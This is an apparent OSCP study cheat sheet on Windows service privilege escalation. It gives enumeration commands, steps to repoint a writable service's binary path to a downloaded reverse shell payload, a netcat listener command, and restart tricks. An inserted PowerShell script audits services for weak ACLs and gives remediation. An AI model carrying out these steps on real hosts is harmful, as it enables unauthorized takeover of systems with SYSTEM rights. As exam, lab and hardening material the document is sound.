Service Exploits

Windows Privilege Escalation Cheat Sheet – Service Exploits

Service exploits are very likely to come up in your OSCP exam.

This can include things like insecure file permissions and unquoted service paths, amongst others.

This should probably be your biggest area of focus for Windows priv esc before your exam.

Insecure service permissions

Run winPEAS to check whether you can change the configuration of a service or not:

Download winPEAS to your Windows target

Execute the binary:
winpeas.exe

Can you modify the service?

Download accesschk.exe to your Windows target

accesschk.exe /accepteula -uwcqv user <SERVICE>

What does the service do? Can your user restart it?

sc qc <SERVICE>

'START_TYPE : DEMAND_START' means the service does not start automatically; it has to be started manually

'BINARY_PATH_NAME' points to the service executable

What is the current state of the service?

sc query <SERVICE>
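The three checks above (can the service configuration be changed, what binary does it run, how is it started) can be collected for every service at once. The following PowerShell script is an added example, not part of the original cheat sheet or of winPEAS/accesschk: run it as an administrator on a host you manage to list services whose executable, executable directory, or registry configuration key grants write rights to low-privileged principals. The principal names are assumptions for an English-language Windows install, and the `$fileMask`/`$regMask` right sets are my choice of "can modify" rights.

```powershell
# Added example (not from the original cheat sheet): read-only audit of service
# configurations for an administrator hardening a host. Flags services whose
# executable, its directory, or its Services registry key is writable by
# low-privileged principals. Principal names assume an English-language install.
$weakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal replace or alter the binary or its folder (assumed set).
$fileMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                  [System.Security.AccessControl.FileSystemRights]::Modify -bor
                  [System.Security.AccessControl.FileSystemRights]::FullControl -bor
                  [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                  [System.Security.AccessControl.FileSystemRights]::TakeOwnership)

# Rights that let a principal rewrite ImagePath / Start under the Services key (assumed set).
$regMask = [int]([System.Security.AccessControl.RegistryRights]::SetValue -bor
                 [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
                 [System.Security.AccessControl.RegistryRights]::WriteKey -bor
                 [System.Security.AccessControl.RegistryRights]::FullControl -bor
                 [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                 [System.Security.AccessControl.RegistryRights]::TakeOwnership)

# Extract the executable from a PathName such as
#   "C:\Program Files\Foo\svc.exe" -arg   or   C:\Windows\system32\svchost.exe -k netsvcs
function Get-ServiceExecutable([string]$pathName) {
    if ([string]::IsNullOrWhiteSpace($pathName)) { return $null }
    $p = $pathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $null
    }
    # Unquoted: take everything up to and including the first ".exe" so a path
    # containing spaces is kept whole instead of cut at the first space.
    $m = [regex]::Match($p, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($p -split ' ')[0]
}

# Return "principal [rights]" strings for Allow ACEs on $path that grant any bit of
# $mask to a weak principal. $rightsProperty is FileSystemRights for files and
# directories, RegistryRights for registry keys.
function Get-WeakAces([string]$path, [string]$rightsProperty, [int]$mask) {
    if (-not (Test-Path -LiteralPath $path)) { return @() }
    $acl = Get-Acl -LiteralPath $path -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $weakPrincipals -contains $_.IdentityReference.Value -and
        (([int]$_.$rightsProperty) -band $mask) -ne 0
    } | ForEach-Object { "$($_.IdentityReference.Value) [$($_.$rightsProperty)]" })
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $exe = Get-ServiceExecutable $svc.PathName
    if ($exe) { $exe = [Environment]::ExpandEnvironmentVariables($exe) }
    $dir = if ($exe) { Split-Path -Parent $exe } else { $null }

    $binaryAcl = if ($exe) { Get-WeakAces $exe 'FileSystemRights' $fileMask } else { @() }
    $dirAcl    = if ($dir) { Get-WeakAces $dir 'FileSystemRights' $fileMask } else { @() }
    $regAcl    = Get-WeakAces "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)" 'RegistryRights' $regMask

    if ($binaryAcl.Count -or $dirAcl.Count -or $regAcl.Count) {
        [pscustomobject]@{
            Service   = $svc.Name
            StartMode = $svc.StartMode      # Auto / Manual (DEMAND_START) / Disabled
            State     = $svc.State
            RunAs     = $svc.StartName      # LocalSystem services are the highest-impact ones to fix
            Binary    = $exe
            BinaryAcl = ($binaryAcl -join '; ')
            DirAcl    = ($dirAcl -join '; ')
            RegAcl    = ($regAcl -join '; ')
        }
    }
}

$findings | Sort-Object RunAs, Service | Format-Table -AutoSize
```

Two caveats. The service object's own security descriptor, which is what `accesschk -c` queries (rights such as SERVICE_CHANGE_CONFIG), is a separate ACL from the file and registry ACLs checked here; it is shown in SDDL by `sc sdshow <SERVICE>` and this script does not parse it, so an empty result does not rule out a service whose object DACL is weak. Remediation for anything it does report is to move the binary under a protected directory (Program Files, System32) and remove the write ACE with `icacls`, then re-run the audit.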

Can you set a new binary path for the service?

If so, download a reverse shell payload to your target and set a new path:

sc config <SERVICE> binpath= "\"C:\NEW\PATH\TO\BINARY\""

Set up a Netcat listener:

nc -lnvp <PORT>

Start or restart the service:

net start <SERVICE>

or, if it is already running, stop it and start it again (net has no restart subcommand):

net stop <SERVICE>
net start <SERVICE>

If the start type prevents you from starting it, set it to on-demand (manual) start first, then use net start:

sc config <SERVICE> start= demand

Offensive Security might try to be sneaky and disable your ability to start or restart a service.

You can, however, get around this by restarting the machine (if the service autoruns on startup):

shutdown /r

Last updated 4 years ago